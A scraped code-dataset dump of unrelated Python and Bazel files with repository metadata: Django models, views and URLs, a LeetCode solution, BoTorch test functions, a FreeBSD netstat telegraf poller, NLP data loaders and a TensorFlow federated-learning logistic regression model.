[os.remove(f'pipeline_runs/{pipeline_run}') for pipeline_run in os.listdir('pipeline_runs')]
if not os.path.isdir(f'/pipeline_scores/{primitive.split(".")[-1]}'):
os.mkdir(f'/pipeline_scores/{primitive.split(".")[-1]}')
for pipeline, datasets in pipelines:
pipeline.write_pipeline(output_dir = './pipelines')
for dataset in datasets:
print(f'Generating pipeline for {primitive.split(".")[-1]} on {dataset}')
if primitive.split(".")[-1] in ['Duke', 'Sloth']:
pipeline.fit_produce(
dataset,
output_yml_dir = './pipeline_runs',
submission = True
)
else:
if primitive.split(".")[-1] == 'NBEATS':
shutil.rmtree(f'/scratch_dir/nbeats')
pipeline.fit_score(
dataset,
output_yml_dir = './pipeline_runs',
output_score_dir = f'/pipeline_scores/{primitive.split(".")[-1]}',
submission = True
)
os.system('gzip -r pipeline_runs')
if __name__ == '__main__':
fire.Fire(generate_pipelines) | 50.990244 | 118 | 0.672534 | 1,052 | 10,453 | 6.224335 | 0.244297 | 0.107514 | 0.072694 | 0.058033 | 0.512065 | 0.446243 | 0.31964 | 0.209835 | 0.137752 | 0.112706 | 0 | 0.02989 | 0.235052 | 10,453 | 205 | 119 | 50.990244 | 0.78902 | 0.01368 | 0 | 0.321053 | 1 | 0 | 0.381733 | 0.35941 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005263 | false | 0 | 0.126316 | 0 | 0.131579 | 0.005263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a16015f7fdd109191a18e2ce3c5cc5cd31b338c6 | 210 | py | Python | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | gorynych/ontologies/gch/edges/basic/__init__.py | vurmux/gorynych | d721e8cdb61f7c7ee6bc4bd31026605df15f2d9d | [
"Apache-2.0"
] | null | null | null | __all__ = [
"aggregation",
"association",
"composition",
"connection",
"containment",
"dependency",
"includes",
"membership",
"ownership",
"responsibility",
"usage"
] | 16.153846 | 21 | 0.557143 | 12 | 210 | 9.416667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27619 | 210 | 13 | 22 | 16.153846 | 0.743421 | 0 | 0 | 0 | 0 | 0 | 0.521327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a163e601ea9b0587f0a7996da2ea54d7b047cc87 | 597 | py | Python | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | api_app/migrations/0001_initial.py | DurkinDevelopment/coinbase_api | 0cea72234d481d09ff906f7bc064cfe16111c785 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-15 02:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='SpotPrice',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('currency', models.CharField(max_length=200)),
('amount', models.FloatField()),
('timestamp', models.DateField()),
],
),
]
| 24.875 | 117 | 0.562814 | 57 | 597 | 5.824561 | 0.77193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046005 | 0.308208 | 597 | 23 | 118 | 25.956522 | 0.757869 | 0.077052 | 0 | 0 | 1 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a163f9dace925925161f417c4fc2f6f13d99f9d2 | 924 | py | Python | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-12-22T13:11:12.000Z | 2021-12-22T13:11:12.000Z | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | 9 | 2020-10-28T07:07:05.000Z | 2021-06-28T20:05:37.000Z | Kalender/views.py | RamonvdW/nhb-apps | 5a9f840bfe066cd964174515c06b806a7b170c69 | [
"BSD-3-Clause-Clear"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.views.generic import View
from django.urls import reverse
from django.http import HttpResponseRedirect
from Functie.rol import Rollen, rol_get_huidige
from .view_maand import get_url_huidige_maand
class KalenderLandingPageView(View):
""" Deze pagina is puur voor het doorsturen naar een van de andere pagina's
afhankelijk van de gekozen rol.
"""
@staticmethod
def get(request, *args, **kwargs):
rol_nu = rol_get_huidige(request)
if rol_nu == Rollen.ROL_BB:
url = reverse('Kalender:manager')
elif rol_nu == Rollen.ROL_HWL:
url = reverse('Kalender:vereniging')
else:
url = get_url_huidige_maand()
return HttpResponseRedirect(url)
# end of file
| 26.4 | 79 | 0.683983 | 122 | 924 | 5.04918 | 0.606557 | 0.048701 | 0.042208 | 0.058442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008451 | 0.231602 | 924 | 34 | 80 | 27.176471 | 0.859155 | 0.290043 | 0 | 0 | 0 | 0 | 0.05538 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a16900fa8a0412a37028d1da77ef8f912a14e56f | 259 | py | Python | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 14 | 2018-10-29T00:52:18.000Z | 2022-03-23T20:07:11.000Z | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 4 | 2020-07-12T05:19:05.000Z | 2020-09-20T12:40:47.000Z | Control/control_common.py | TomE8/drones | c92865556dd3df2d5f5b73589cd48e413bff3a3a | [
"MIT"
] | 2 | 2019-03-08T01:36:47.000Z | 2019-09-12T04:07:19.000Z |
class AxisIndex(): #TODO: read this value from config file
LEFT_RIGHT=0
FORWARD_BACKWARDS=1
ROTATE=2
UP_DOWN=3
class ButtonIndex():
TRIGGER = 0
SIDE_BUTTON = 1
HOVERING = 2
EXIT = 10
class ThresHold():
SENDING_TIME = 0.5 | 17.266667 | 58 | 0.648649 | 37 | 259 | 4.405405 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058201 | 0.27027 | 259 | 15 | 59 | 17.266667 | 0.804233 | 0.146718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a16aadbd9d67147c97cce0ae81ac212da4c01e1c | 2,472 | py | Python | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/16.3-sum-closest.2.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | # @lc app=leetcode id=16 lang=python3
#
# [16] 3Sum Closest
#
# https://leetcode.com/problems/3sum-closest/description/
#
# algorithms
# Medium (46.33%)
# Likes: 3080
# Dislikes: 169
# Total Accepted: 570.4K
# Total Submissions: 1.2M
# Testcase Example: '[-1,2,1,-4]\n1'
#
# Given an array nums of n integers and an integer target, find three integers
# in nums such that the sum is closest to target. Return the sum of the three
# integers. You may assume that each input would have exactly one solution.
#
#
# Example 1:
#
#
# Input: nums = [-1,2,1,-4], target = 1
# Output: 2
# Explanation: The sum that is closest to the target is 2. (-1 + 2 + 1 =
# 2).
#
#
#
# Constraints:
#
#
# 3 <= nums.length <= 10^3
# -10^3 <= nums[i] <= 10^3
# -10^4 <= target <= 10^4
#
#
#
# @lc tags=array;two-pointers
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# 给定一个数组,求数组中三个元素和最接近目标的和。
# 使用双指针法。首先对数组排序,确定第一个值,之后在剩下的数组中,使用双指针法找最小的差值。因为有序,所以可以通过左右移动指针,来修改剩余两个数的和的大小变化方向。之后判断是否重复来剪枝。
#
# @lc idea=end
# @lc group=two-pointers
# @lc rank=10
# @lc code=start
class Solution:
def threeSumClosest(self, nums: List[int], target: int) -> int:
# dic = {}
# for n in nums:
# if not dic.__contains__(n):
# dic[n] = 1
# elif dic[n] < 3:
# dic[n] += 1
# nums = []
# for i in list(dic.keys()):
# nums += [i]*dic[i]
nums.sort()
s = nums[0] + nums[1] + nums[2]
dif = abs(s - target)
for i in range(len(nums) - 2):
# 重复元素。
if i > 0 and nums[i] == nums[i - 1]:
continue
l = i + 1
r = len(nums) - 1
t = target - nums[i]
while l < r:
if abs(t - nums[l] - nums[r]) < dif:
dif = abs(t - nums[l] - nums[r])
s = nums[i] + nums[l] + nums[r]
# 确定方向
if t - nums[l] - nums[r] > 0:
l = l + 1
else:
r = r - 1
if dif == 0:
break
return s
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('nums = [-1,2,1,-4], target = 1')
print('Output :')
print(str(Solution().threeSumClosest([-1, 2, 1, -4], 1)))
print('Exception :')
print('2')
print()
pass
# @lc main=end | 22.071429 | 95 | 0.506068 | 340 | 2,472 | 3.644118 | 0.376471 | 0.009685 | 0.012107 | 0.012914 | 0.05569 | 0.046812 | 0.024213 | 0 | 0 | 0 | 0 | 0.052632 | 0.338997 | 2,472 | 112 | 96 | 22.071429 | 0.70563 | 0.479773 | 0 | 0.058824 | 0 | 0 | 0.062193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0.058824 | 0.029412 | 0 | 0.117647 | 0.235294 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a16be12b3f57a68c02b41dfe786a31910f86a92e | 2,142 | py | Python | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | null | null | null | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | null | null | null | test/test_functions/test_michalewicz.py | carefree0910/botorch | c0b252baba8f16a4ea2eb3f99c266fba47418b1f | [
"MIT"
] | 1 | 2019-05-07T23:53:08.000Z | 2019-05-07T23:53:08.000Z | #! /usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from botorch.test_functions.michalewicz import (
GLOBAL_MAXIMIZER,
GLOBAL_MAXIMUM,
neg_michalewicz,
)
class TestNegMichalewicz(unittest.TestCase):
def test_single_eval_neg_michalewicz(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
for dtype in (torch.float, torch.double):
X = torch.zeros(10, device=device, dtype=dtype)
res = neg_michalewicz(X)
self.assertEqual(res.dtype, dtype)
self.assertEqual(res.device.type, device.type)
self.assertEqual(res.shape, torch.Size())
def test_single_eval_neg_michalewicz_cuda(self):
if torch.cuda.is_available():
self.test_single_eval_neg_michalewicz(cuda=True)
def test_batch_eval_neg_michalewicz(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
for dtype in (torch.float, torch.double):
X = torch.zeros(2, 10, device=device, dtype=dtype)
res = neg_michalewicz(X)
self.assertEqual(res.dtype, dtype)
self.assertEqual(res.device.type, device.type)
self.assertEqual(res.shape, torch.Size([2]))
def test_batch_eval_neg_michalewicz_cuda(self):
if torch.cuda.is_available():
self.test_batch_eval_neg_michalewicz(cuda=True)
def test_neg_michalewicz_global_maximum(self, cuda=False):
device = torch.device("cuda") if cuda else torch.device("cpu")
for dtype in (torch.float, torch.double):
X = torch.tensor(
GLOBAL_MAXIMIZER, device=device, dtype=dtype, requires_grad=True
)
res = neg_michalewicz(X)
res.backward()
self.assertAlmostEqual(res.item(), GLOBAL_MAXIMUM, places=4)
self.assertLess(X.grad.abs().max().item(), 1e-3)
def test_neg_michalewicz_global_maximum_cuda(self):
if torch.cuda.is_available():
self.test_neg_michalewicz_global_maximum(cuda=False)
| 38.25 | 80 | 0.661531 | 272 | 2,142 | 5.018382 | 0.257353 | 0.133333 | 0.079121 | 0.064469 | 0.712821 | 0.712821 | 0.605861 | 0.557509 | 0.557509 | 0.52967 | 0 | 0.006075 | 0.231559 | 2,142 | 55 | 81 | 38.945455 | 0.823208 | 0.042484 | 0 | 0.372093 | 0 | 0 | 0.010249 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 1 | 0.139535 | false | 0 | 0.069767 | 0 | 0.232558 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a172ea5b14e8133a222d02986a593e89323cad7c | 847 | py | Python | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | FreeBSD/bsd_netstats_poller.py | failedrequest/telegraf-plugins | 9cda0612a912f219fa84724f12af1f428483a37a | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# 3/21/2021
# Updated for python3
# A Simple sysctl to telegraf plugin for freebsd's netstats ip info
from freebsd_sysctl import Sysctl as sysctl
import subprocess as sp
import re
import json
import sys
import pprint as pp
hostname = sysctl("kern.hostname").value
netstat_data = {}
points_netstat = {}
netstat_output = sp.check_output(["netstat", "-s", "-p", "ip", "--libxo", "json", "/dev/null"],universal_newlines=True)
netstat_data = json.loads(netstat_output)
for x in netstat_data["statistics"]:
for k,v in netstat_data["statistics"][x].items():
points_netstat[k] = v
def points_to_influx(points):
field_tags= ",".join(["{k}={v}".format(k=str(x[0]), v=x[1]) for x in list(points_netstat.items())])
print(("bsd_netstat,type=netstat {}").format(field_tags))
points_to_influx(points_netstat)
| 22.289474 | 119 | 0.709563 | 131 | 847 | 4.435115 | 0.496183 | 0.075732 | 0.020654 | 0.079174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015007 | 0.134593 | 847 | 37 | 120 | 22.891892 | 0.777626 | 0.138135 | 0 | 0 | 0 | 0 | 0.140278 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.388889 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a1773cd4561ed64fe6472e04a837e283a5378aa9 | 1,763 | py | Python | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | data/ebmnlp/stream.py | bepnye/tf_ner | c68b9f489e56e0ec8cfb02b7115d2b07d721ac6f | [
"Apache-2.0"
] | null | null | null | import os
import data_utils
from pathlib import Path
top_path = Path(os.path.dirname(os.path.abspath(__file__)))
EBM_NLP = Path('/Users/ben/Desktop/ebm_nlp/repo/ebm_nlp_2_00/')
NO_LABEL = '0'
def overwrite_tags(new_tags, tags):
for i, t in enumerate(new_tags):
if t != NO_LABEL:
tags[i] = t
def get_tags(d):
pmid_tags = {}
for e in ['participants', 'interventions', 'outcomes']:
for a in (EBM_NLP / 'annotations' / 'aggregated' / 'starting_spans' / e / d).glob('*.ann'):
pmid = a.stem.split('.')[0]
tags = a.open().read().split()
tags = [e[0] if t == '1' else NO_LABEL for t in tags]
if pmid not in pmid_tags:
pmid_tags[pmid] = tags
else:
overwrite_tags(tags, pmid_tags[pmid])
return pmid_tags
def get_words(pmids):
return { pmid: (EBM_NLP / 'documents' / '{}.tokens'.format(pmid)).open().read().split() for pmid in pmids }
def get_seqs(tag_d, word_d, keys):
tag_seqs = []
word_seqs = []
for k in keys:
words, tags = data_utils.generate_seqs(word_d[k], tag_d[k])
tag_seqs += tags
word_seqs += words
return word_seqs, tag_seqs
TRAIN_TAG_D = get_tags(Path('train/'))
TRAIN_PMIDS = sorted(TRAIN_TAG_D.keys())
TRAIN_WORD_D = get_words(TRAIN_PMIDS)
TRAIN_WORDS, TRAIN_TAGS = get_seqs(TRAIN_TAG_D, TRAIN_WORD_D, TRAIN_PMIDS)
TEST_TAG_D = get_tags(Path('test/gold/'))
TEST_PMIDS = sorted(TEST_TAG_D.keys())
TEST_WORD_D = get_words(TEST_PMIDS)
TEST_WORDS, TEST_TAGS = get_seqs(TEST_TAG_D, TEST_WORD_D, TEST_PMIDS)
def train_words():
return TRAIN_WORDS
def train_tags():
return TRAIN_TAGS
def test_words():
return TEST_WORDS
def test_tags():
return TEST_TAGS
def word_embeddings():
return ((top_path / '..' / 'embeddings' / 'glove.840B.300d.txt').open(), 300)
| 28.435484 | 109 | 0.683494 | 289 | 1,763 | 3.868512 | 0.259516 | 0.028623 | 0.0322 | 0.028623 | 0.026834 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010944 | 0.170732 | 1,763 | 61 | 110 | 28.901639 | 0.753762 | 0 | 0 | 0 | 0 | 0 | 0.105502 | 0.025525 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.06 | 0.12 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
a17f75ddc89a6583319e9dcd13c17dded131aa22 | 1,259 | bzl | Python | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | tools/build_defs/native_tools/tool_access.bzl | slsyy/rules_foreign_cc | 34ab7f86a3ab1b2381cb4820d08a1c892f55bf54 | [
"Apache-2.0"
] | null | null | null | # buildifier: disable=module-docstring
load(":native_tools_toolchain.bzl", "access_tool")
def get_cmake_data(ctx):
return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:cmake_toolchain", ctx, "cmake")
def get_ninja_data(ctx):
return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:ninja_toolchain", ctx, "ninja")
def get_make_data(ctx):
return _access_and_expect_label_copied("@rules_foreign_cc//tools/build_defs:make_toolchain", ctx, "make")
def _access_and_expect_label_copied(toolchain_type_, ctx, tool_name):
tool_data = access_tool(toolchain_type_, ctx, tool_name)
if tool_data.target:
# This could be made more efficient by changing the
# toolchain to provide the executable as a target
cmd_file = tool_data
for f in tool_data.target.files.to_list():
if f.path.endswith("/" + tool_data.path):
cmd_file = f
break
return struct(
deps = [tool_data.target],
# as the tool will be copied into tools directory
path = "$EXT_BUILD_ROOT/{}".format(cmd_file.path),
)
else:
return struct(
deps = [],
path = tool_data.path,
)
| 38.151515 | 111 | 0.669579 | 170 | 1,259 | 4.6 | 0.382353 | 0.071611 | 0.076726 | 0.102302 | 0.351662 | 0.257033 | 0.257033 | 0.257033 | 0.257033 | 0.257033 | 0 | 0 | 0.232724 | 1,259 | 32 | 112 | 39.34375 | 0.809524 | 0.144559 | 0 | 0.083333 | 0 | 0 | 0.208022 | 0.166978 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
a1823c37136cd59bed9a94266ef25fc93fb40d71 | 255 | py | Python | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | gallery/photo/urls.py | andyjohn23/django-photo | e65ee3ab6fdad3a9d836d32b7f1026efcc728a41 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('category/<category>/', views.CategoryListView.as_view(), name="category"),
path('search/', views.image_search, name='image-search'),
] | 31.875 | 84 | 0.686275 | 31 | 255 | 5.580645 | 0.483871 | 0.127168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129412 | 255 | 8 | 85 | 31.875 | 0.779279 | 0 | 0 | 0 | 0 | 0 | 0.203125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a183121368090836638181c5ae887b713f923588 | 6,358 | py | Python | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 11 | 2021-05-07T01:28:26.000Z | 2022-03-10T08:23:16.000Z | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 2 | 2021-08-13T10:12:13.000Z | 2021-08-31T02:03:20.000Z | fedsimul/models/mnist/mclr.py | cshjin/fedsimul | 1e2b9a9d9034fbc679dfaff059c42dea5642971d | [
"MIT"
] | 1 | 2021-06-08T07:23:22.000Z | 2021-06-08T07:23:22.000Z | import numpy as np
import tensorflow as tf
from tqdm import trange
from fedsimul.utils.model_utils import batch_data
from fedsimul.utils.tf_utils import graph_size
from fedsimul.utils.tf_utils import process_grad
class Model(object):
'''
This is the tf model for the MNIST dataset with multiple class learner regression.
Images are 28px by 28px.
'''
def __init__(self, num_classes, optimizer, gpu_id=0, seed=1):
""" Initialize the learner.
Args:
num_classes: int
optimizer: tf.train.Optimizer
gpu_id: int, default 0
seed: int, default 1
"""
# params
self.num_classes = num_classes
# create computation graph
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(123 + seed)
_created = self.create_model(optimizer)
self.features = _created[0]
self.labels = _created[1]
self.train_op = _created[2]
self.grads = _created[3]
self.eval_metric_ops = _created[4]
self.loss = _created[5]
self.saver = tf.train.Saver()
# set the gpu resources
gpu_options = tf.compat.v1.GPUOptions(visible_device_list="{}".format(gpu_id), allow_growth=True)
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
self.sess = tf.Session(graph=self.graph, config=config)
# self.sess = tf.Session(graph=self.graph)
# REVIEW: find memory footprint and compute cost of the model
self.size = graph_size(self.graph)
with self.graph.as_default():
self.sess.run(tf.global_variables_initializer())
metadata = tf.RunMetadata()
opts = tf.profiler.ProfileOptionBuilder.float_operation()
self.flops = tf.profiler.profile(self.graph, run_meta=metadata, cmd='scope', options=opts).total_float_ops
def create_model(self, optimizer):
""" Model function for Logistic Regression.
Args:
optimizer: tf.train.Optimizer
Returns:
tuple: (features, labels, train_op, grads, eval_metric_ops, loss)
"""
features = tf.placeholder(tf.float32, shape=[None, 784], name='features')
labels = tf.placeholder(tf.int64, shape=[None, ], name='labels')
logits = tf.layers.dense(inputs=features,
units=self.num_classes,
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.001))
predictions = {
"classes": tf.argmax(input=logits, axis=1),
"probabilities": tf.nn.softmax(logits, name="softmax_tensor")
}
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
grads_and_vars = optimizer.compute_gradients(loss)
grads, _ = zip(*grads_and_vars)
train_op = optimizer.apply_gradients(grads_and_vars, global_step=tf.train.get_global_step())
eval_metric_ops = tf.count_nonzero(tf.equal(labels, predictions["classes"]))
return features, labels, train_op, grads, eval_metric_ops, loss
def set_params(self, latest_params=None, momentum=False, gamma=0.9):
""" Set parameters from server
Args:
latest_params: list
list of tf.Variables
momentum: boolean
gamma: float
TODO: update variable with its local variable and the value from
latest_params
TODO: DO NOT set_params from the global, instead, use the global gradient to update
"""
if latest_params is not None:
with self.graph.as_default():
# previous gradient
all_vars = tf.trainable_variables()
for variable, value in zip(all_vars, latest_params):
if momentum:
curr_val = self.sess.run(variable)
new_val = gamma * curr_val + (1 - gamma) * value
# TODO: use `assign` function instead of `load`
variable.load(new_val, self.sess)
else:
variable.load(value, self.sess)
def get_params(self):
""" Get model parameters.
Returns:
model_params: list
list of tf.Variables
"""
with self.graph.as_default():
model_params = self.sess.run(tf.trainable_variables())
return model_params
def get_gradients(self, data, model_len):
""" Access gradients of a given dataset.
Args:
data: dict
model_len: int
Returns:
num_samples: int
grads: tuple
"""
grads = np.zeros(model_len)
num_samples = len(data['y'])
with self.graph.as_default():
model_grads = self.sess.run(self.grads, feed_dict={self.features: data['x'],
self.labels: data['y']})
grads = process_grad(model_grads)
return num_samples, grads
def solve_inner(self, data, num_epochs=1, batch_size=32):
'''Solves local optimization problem.
Args:
data: dict with format {'x':[], 'y':[]}
num_epochs: int
batch_size: int
Returns:
soln: list
comp: float
'''
for _ in trange(num_epochs, desc='Epoch: ', leave=False, ncols=120):
for X, y in batch_data(data, batch_size):
with self.graph.as_default():
self.sess.run(self.train_op, feed_dict={self.features: X, self.labels: y})
soln = self.get_params()
comp = num_epochs * (len(data['y']) // batch_size) * batch_size * self.flops
return soln, comp
def test(self, data):
'''
Args:
data: dict of the form {'x': [], 'y': []}
Returns:
tot_correct: int
loss: float
'''
with self.graph.as_default():
tot_correct, loss = self.sess.run([self.eval_metric_ops, self.loss],
feed_dict={self.features: data['x'], self.labels: data['y']})
return tot_correct, loss
def close(self):
self.sess.close()
